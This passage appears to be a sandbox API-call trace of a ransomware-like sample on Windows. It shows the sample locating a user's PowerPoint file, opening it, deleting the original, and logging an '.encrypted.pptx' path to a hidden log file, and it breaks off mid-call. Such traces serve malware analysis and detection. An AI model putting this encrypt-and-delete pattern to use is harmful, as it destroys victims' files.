wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.608] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb755f130, ftCreationTime.dwHighDateTime=0x1d59f5f, ftLastAccessTime.dwLowDateTime=0x17f12a10, ftLastAccessTime.dwHighDateTime=0x1d53a60, ftLastWriteTime.dwLowDateTime=0x17f12a10, ftLastWriteTime.dwHighDateTime=0x1d53a60, nFileSizeHigh=0x0, nFileSizeLow=0x15d56, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MTos9HWEpFvwpo.pptx", cAlternateFileName="MTOS9H~1.PPT")) returned 0x7c2100 [0036.609] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.609] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.609] CharLowerBuffW (in: lpsz="byte[89430]", cchLength=0xb | out: lpsz="byte[89430]") returned 0xb [0036.609] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.609] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.609] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.609] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.609] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.609] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.610] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.610] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.610] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.610] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.610] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.611] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.611] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.611] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mtos9hwepfvwpo.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0036.612] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.612] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.612] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.612] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.612] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.612] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.612] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.612] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.613] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.613] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.613] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0036.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.613] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.613] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.613] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.613] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx", lpFilePart=0x0) returned 0x3b [0036.614] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb755f130, ftCreationTime.dwHighDateTime=0x1d59f5f, ftLastAccessTime.dwLowDateTime=0x17f12a10, ftLastAccessTime.dwHighDateTime=0x1d53a60, ftLastWriteTime.dwLowDateTime=0x1587bfa0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x15d56, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="MTos9HWEpFvwpo.pptx", cAlternateFileName="MTOS9H~1.PPT")) returned 0x7c2100 [0036.614] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mtos9hwepfvwpo.pptx")) returned 1 [0036.615] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb755f130, ftCreationTime.dwHighDateTime=0x1d59f5f, ftLastAccessTime.dwLowDateTime=0x17f12a10, ftLastAccessTime.dwHighDateTime=0x1d53a60, ftLastWriteTime.dwLowDateTime=0x1587bfa0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x15d56, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="MTos9HWEpFvwpo.pptx", cAlternateFileName="MTOS9H~1.PPT")) returned 0 [0036.615] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.616] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.616] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.616] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.616] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.616] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.616] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.616] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0036.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.617] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0036.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.617] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.617] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.617] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.617] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.617] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.617] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.617] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.617] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1f00, lpOverlapped=0x0) returned 1 [0036.617] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.618] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x1f00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.618] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0036.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.encrypted.pptx\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0036.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x48) returned 0x88e138 [0036.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.encrypted.pptx\r\n", cchWideChar=72, lpMultiByteStr=0x88e138, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MTos9HWEpFvwpo.encrypted.pptx\r\n", lpUsedDefaultChar=0x0) returned 72 [0036.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0036.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0036.618] WriteFile (in: hFile=0x140, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x47, lpOverlapped=0x0) returned 1 [0036.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0036.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.618] CloseHandle (hObject=0x140) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 